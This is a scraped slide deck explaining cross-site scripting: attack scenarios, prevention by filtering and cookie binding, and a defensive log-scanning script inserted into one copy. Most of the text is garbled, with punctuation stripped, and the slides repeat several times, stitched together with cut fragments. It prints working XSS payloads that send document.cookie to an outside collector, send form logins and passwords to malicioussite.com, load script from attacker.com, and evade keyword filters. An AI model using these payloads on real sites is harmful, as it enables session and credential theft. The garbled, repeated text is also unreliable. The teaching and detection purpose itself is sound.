In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
12
Persistenthellip
The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw it occurs when the data provided by the attacker is saved by the server and then permanently displayed on normal pages returned to other users in the course of regular browsing without proper HTML escaping A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read
13
Examples of attackshelliphelliphellip
14
Scripting Via Malicious Linkhellip
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
13
Examples of attackshelliphelliphellip
14
Scripting Via Malicious Linkhellip
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scripts…
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis.
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effective…
Problems with this… a substantial reduction in functionality and responsiveness. Many sites do not work without client-side scripting, forcing users to disable protection for that site and opening their systems to the threat.
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content.
For explaining purpose, remember the syntax…
SYNTAX
• Script injection in an image src tag
• Embed nested quotes: ' or " or \u0022 \u0027
• Keyword filters that allow any JS to execute are useless: A = 'navi'; B = 'gator.userAgent'; alert(eval(A+B))
• Limited input length + script block embed = unlimited script power (script src=)
• SSL pages warn if script src comes from an untrusted site, but if you can upload, say, an img that is actually JS commands…
• Methods of script encoding: <img src="vbscript:do%63ument.lo%63ation='http://ab.com'">
• <IMG SRC="javascript:alert('test')">
• <IMG SRC="javasc ript:alert('test')">
Types of information leakage
Client can reveal cookies to 3rd party (session state, order info, etc.):
http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script>
Client can reveal posted form items to 3rd party (userID/passwd, etc.):
<form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value+':'+document.forms(1).password.value;" </form>
Client can be tricked into accessing/posting spoofed info to trusted server:
www.trustedserver.com/xss.asp?name = <iframe src="http://www.trustedserver.com/auth_area/orderupdate?items=4000"></iframe>
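The defender's counterpart to the leakage patterns above and to the encoding tricks on the SYNTAX slide, as an added example that is not part of the original slides: a small scanner that parses access-log lines, URL-decodes each query parameter (bounded, so double encoding and the `%63`-for-`c` trick are undone before matching) and flags values carrying the probe shapes the slides list. Node.js; the log lines, hostnames (`collector.invalid`) and timestamps are constructed, and the paths `/a.php`, `/xss.asp` and `/search` are hypothetical.

```javascript
// Added example, not from the slides: scan constructed access-log lines for
// query parameters that carry the script-injection shapes the slides list.
// Node.js, no dependencies. Log lines are in Common Log Format.

// Constructed sample log (RFC 5737 client addresses, hypothetical paths).
const LOG_LINES = [
  '203.0.113.9 - - [10/Oct/2000:13:55:36 -0700] "GET /a.php?variable=%22%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fcollector.invalid%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.0" 200 2326',
  '203.0.113.9 - - [10/Oct/2000:13:55:40 -0700] "GET /xss.asp?name=%3Ciframe%20src%3D%22http%3A%2F%2Fwww.trustedserver.com%2Fauth_area%2Forderupdate%3Fitems%3D4000%22%3E HTTP/1.0" 200 512',
  '198.51.100.4 - - [10/Oct/2000:13:56:01 -0700] "GET /search?q=%3CIMG%20SRC%3D%22javas%63ript%3Aalert(1)%22%3E HTTP/1.0" 200 1024',
  '198.51.100.4 - - [10/Oct/2000:13:57:12 -0700] "GET /search?q=blue+widgets HTTP/1.0" 200 4096',
];

// Shapes taken from the slides' own examples.
const PROBE_PATTERNS = [
  /<\s*script\b/i,                // opening <script> tag
  /<\s*iframe\b/i,                // injected frame (third leakage example)
  /javascript\s*:/i,              // javascript: URL in img src / href
  /vbscript\s*:/i,                // vbscript: encoding example on the slides
  /\bon[a-z]+\s*=/i,              // inline event handler (onerror=, onload=, ...)
  /document\.(cookie|location)/i, // cookie read / redirect used to exfiltrate
];

// Undo form encoding and up to three rounds of percent-decoding, so that
// "%3C" and "%253C" both become "<" and "javas%63ript" becomes "javascript".
function fullyDecode(s) {
  let cur = s.replace(/\+/g, " "); // in a query string '+' means space
  for (let i = 0; i < 3; i++) {
    let next;
    try { next = decodeURIComponent(cur); } catch (e) { break; } // malformed %xx
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Minimal Common Log Format parser; returns null for lines it cannot read.
function parseLogLine(line) {
  const m = line.match(/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)/);
  if (!m) return null;
  const [, ip, time, method, target, status] = m;
  const q = target.indexOf("?");
  return {
    ip, time, method,
    path: q < 0 ? target : target.slice(0, q),
    query: q < 0 ? "" : target.slice(q + 1),
    status: Number(status),
  };
}

// Return one finding per query parameter whose decoded value matches a probe.
function findProbes(line) {
  const req = parseLogLine(line);
  if (!req || !req.query) return [];
  const hits = [];
  for (const kv of req.query.split("&")) {
    const eq = kv.indexOf("=");
    const param = fullyDecode(eq < 0 ? kv : kv.slice(0, eq));
    const value = fullyDecode(eq < 0 ? "" : kv.slice(eq + 1));
    const matched = PROBE_PATTERNS.filter((re) => re.test(value)).map(String);
    if (matched.length) hits.push({ ip: req.ip, path: req.path, param, value, matched });
  }
  return hits;
}

function scanLog(lines) {
  return lines.flatMap(findProbes);
}

for (const hit of scanLog(LOG_LINES)) {
  console.log(`${hit.ip} ${hit.path} param=${hit.param} matched=${hit.matched.join(",")}`);
}
```

Decoding before matching is the part that matters: a rule that looks for the literal string `javascript:` in the raw log misses `javas%63ript:`, which is exactly the evasion the SYNTAX slide points at. Pattern lists like this one are a triage aid, not a guarantee; a request that is flagged is a reason to look at the page that reflected the parameter.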
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1. http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt
2. http://www.cgisecurity.com/archive/php/phpNuke_CSS_5_holes.txt
3. http://www.cgisecurity.com/archive/php/phpNuke_2_more_CSS_holes.txt
Related vulnerabilities
Several classes of vulnerabilities or attack techniques are related to XSS. Cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege.[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems at the HTTP protocol level (in addition to enabling attacks such as HTTP response splitting).[32]
Cross-site request forgery (CSRF/XSRF) is almost the opposite of XSS, in that rather than exploiting the user's trust in a site, the attacker (and his malicious page) exploits the site's trust in the client software, submitting requests that the site believes represent conscious and intentional actions of authenticated users.[33]
Lastly, SQL injection exploits a vulnerability in the database layer of an application. When user input is incorrectly filtered, any SQL statements can be executed by the application.
Scripting Via Malicious Link…
In this scenario the attacker sends a specially crafted e-mail message to a victim containing a malicious link, scripting like:
<A HREF="http://legitimateSite.com/registration.cgi?clientprofile=<SCRIPT>malicious code</SCRIPT>">Click here</A>
When a user clicks on this link, the URL is sent to the site, including the malicious code. If the legitimate server sends a page back to the user including the value of clientprofile, the malicious code will be executed on the client Web browser.
Stealing User's COOKIE…
If any part of the Web site uses cookies, then it may be possible to steal them from its users. In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable. When the page is displayed, the malicious script runs, collects the user's cookies and sends a request to the attacker's Web site with the cookies gathered. Using this technique the attacker can gain sensitive data such as passwords, credit card numbers and any arbitrary information the user inputs.
Sending an Unauthorized Request
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message. Because the malicious scripts are executed in a context that appears to have originated from the legitimate server, the attacker has full access to the document retrieved and may send data contained in the page back to their site. If the embedded script code has additional interaction capability with the legitimate server without alerting the victim, the attacker could develop and exploit that posted data to a different page on the legitimate Web server.
By Scripting
Script can read all HTML content/tags in other window.
Script can set/delete tags/content in other window. We can read and set form values, then run a submit().
Script can set vars and call functions in other window.
document.write can allow script to create new tags/content in other window.
This means that a script can read all HTML contents of a document, change the appearance of the document, modify existing tags and values, and modify and submit forms. We have full control of the other window as long as it's in the same document.domain.
If we can forward cookies, then we can also forward other jscript-accessible content to an attacker. We can forward page contents, form values (including hidden…), jscript vars/state, jscript errors.
Some FACTS about the XSS attacks…
By SURVEY…
1st Gen XSS was against public sites and ran against everyone that visited the site.
2nd Gen XSS focused on sites that allow self-reflection XSS.
• Cross-site scripting attacks are a special case of code injection.
• Cross-site scripting carried out on websites was roughly 80% of all security vulnerabilities documented by Symantec as of 2007.
• Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data.
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
SYNTAXscript injection in an image src tag1048708 Embed nested quotes1048708 rsquo or rdquo or u0022 u00271048708 Keyword filters that allow any js toexecute are useless1048708 A = lsquonavirsquo B = lsquogatoruserAgentrsquoalert(eval(A+B))Limited input length + script block embed= unlimited script power (script src=)1048708 SSL pages warn if script src comes fromuntrusted site1048708 but if you can upload say img that is actually jscommands1048708 methods of script encoding1048708 ltimgsrc=vbscriptdo63umentlo63ation=httpabcomgt1048708 ltIMG SRC=javascriptalert(test)gt1048708 ltIMG SRC=javasc riptalert(test)gt
35
Types of information leakageClient can reveal cookies to 3rd party (session state order info etc)
httphostaphpvariable=gtltscriptgtdocumentlocation=httpwwwcgisecuritycomcgi-bincookiecgi20+documentcookieltscriptgt
Client can reveal posted form items to 3rd party (userIDpasswd etc)
ltformgt action=logoninformationjsp method=post onsubmit=hackImg=new Image hackImgsrc=httpwwwmalicioussitecom+documentforms(1)loginvalue++ documentforms(1)passwordvalue ltformgt
Client can be tricked into accessingposting spoofed info to trusted server
wwwtrustedservercomxssaspname = ltiframe src=httpwwwtrustedservercomauth_areaorderupdateitems=4000gtltiframegt
36
YOU CAN FIND EXAMPLES OF XSS ON THESE WEBSITES
1 httpwwwcgisecuritycomarchivephpphpNuke_cross_site_scriptingtxt
2 httpwwwcgisecuritycomarchivephpphpNuke_CSS_5_holestxt
3 httpwwwcgisecuritycomarchivephpphpNuke_2_more_CSS_holestxt
37
Related vulnerabilitiesSeveral classes of vulnerabilities or attack techniques are related to XSS cross-zone scripting exploits zone concepts in certain browsers and usually executes code with a greater privilege[31] HTTP header injection can be used to create cross-site scripting conditions due to escaping problems on HTTP protocol level (in addition to enabling attacks such as HTTP response splitting)[32]
Cross-site request forgery (CSRFXSRF) is almost the opposite of XSS in that rather than exploiting the users trust in a site the attacker (and his malicious page) exploits the sites trust in the client software submitting requests that the site believes represent conscious and intentional actions of authenticated users[33]
Lastly SQL injection exploits a vulnerability in the database layer of an application When user input is incorrectly filtered any SQL statements can be executed by the application
15
In this scenario the attacker sends a specially crafted e-mail message to a victim containing malicious link scripting likeltA HREF=httplegitimateSitecomregistrationcgiclientprofile=ltSCRIPTgtmalicious codeltSCRIPTgtgtClick hereltAgtWhen a user clicks on this link the URL is sent to site name including the malicious code If the legitimate server sends a page back to the user including the value of clientprofile the malicious code will be executed on the client Web browser
16
Stealing Userrsquos COOKIEhellip
17
If any part of the Web site uses cookies then it may be possible to steal them from its users In this scenario the attacker files a page with malicious script to the part of the site that is vulnerable When the page is displayed the malicious script runs collects the users cookies and sends a request to the attackers Web site with the cookies gathered Using this technique the attacker can gain sensitive data such as passwords credit card numbers and any arbitrary information the user inputs
18
Sending an Unauthorized Request
19
In this scenario the user unknowingly executes scripts written by an attacker when they follow a malicious link in a mail message Because the malicious scripts are executed in a context that appears to have originated from the legitimate server the attacker has full access to the document retrieved and may send data contained in the page back to their site If the embedded script code has additional interactions capability with the legitimate server without alerting the victim the attacker could develop and exploit that posted data to a different page on the legitimate Web server
20
By Scripting
21
Script can read all HTML contenttags in other window
Script can setdelete tagscontent in other window We can read and set form values then run a submit()
Script can set vars and call functions in other window
Documentwrite can allow script to create new tagscontent in other window
This means that a script can read all HTML contents of a document change the appearance of the document modify exiting tagsand values modify and submit forms We have full control of the other window as long itrsquos in same documentdomain
If we can forward cookies then we can also forward other jscript accessible content to an attacker We can forward page contents form values (including hiddenhellip) jscript varsstate jscript errors
22
Some FACTS about the XSS attackshelliphelliphellip
23
By SURVEYhelliphelliphellip
1st Gen XSS was against public sites and ran against everyone that visited site
2nd Gen XSS focused on sites that allow self-reflection XSS
24
bull Cross-site scripting attacks are a special case of code injection
bullCross-site scripting carried out on websites were roughly 80 of all security vulnerabilities documented by Symantec as of 2007
bullTheir impact may range from a petty nuisance to a significant security risk depending on the sensitivity of the data
Dynamic XSS with 2way commsVictim Browser
XSS against site
IFRAME
Script commands run here
Other documents on site loaded into here
ltscript src=ldquoattackercominnnerHTML_of_IFRAMErdquogt
XSS Vulnerable Server
Attacker System
New jscripthellip
ltscript src=ldquoattackercomrdquogt
26
Some prominent sites that have been affected in the past arehelliphellip
The search engine Google The email services of Google and
Yahoo The social networking sites Facebook
MySpace and Orkut The developers of MediaWiki have
fixed at least 26 XSS holes in order to protect Wikipedia and other wiki users
Researchers have claimed that as many as 68 of websites are likely open to XSS attacks
27
By seeing all this the question that arises ishelliphellip
Then how can we prevent it
28
Yes some methods are there for
prevention n those are gtgt Filteringgtgt Cookie Securitygtgt Disabling Scriptsgtgt Encryption
29
Filtering
One way to eliminate some XSS vulnerabilities is to validate and reject undesirable characters in input fields or escape all untrusted data using a method appropriate for the output context There are several different escaping schemes that must be used depending on where the untrusted string needs to be placedmdashincluding HTML numeric entity encoding JavaScript escaping CSS escaping and URL encoding Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner
30
Cookie Security
Many web applications rely on session cookies for authentication between individual HTTP requests and because client-side scripts generally have access to these cookies simple XSS exploits can steal these cookies To mitigate this particular threat many web applications tie session cookies to the IP address of the user who originally logged in and only permit that IP to use that cookie
31
Disabling Scriptshellip
Some browsers or browser plugins can be configured to disable client-side scripts on a per-domain basis
Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effectivehellip
Prblms wid thishellip Substantial reduction in functionality and
responsiveness Many sites do not work without client-side
scripting forcing users to disable protection for that site and opening their systems to the threat
32
The easiest way to protect yourself as a user is to only follow links from the main website you wish to view and use its search engine to find the content
33
For explaining Purpose
Remember the syntaxhellip
34
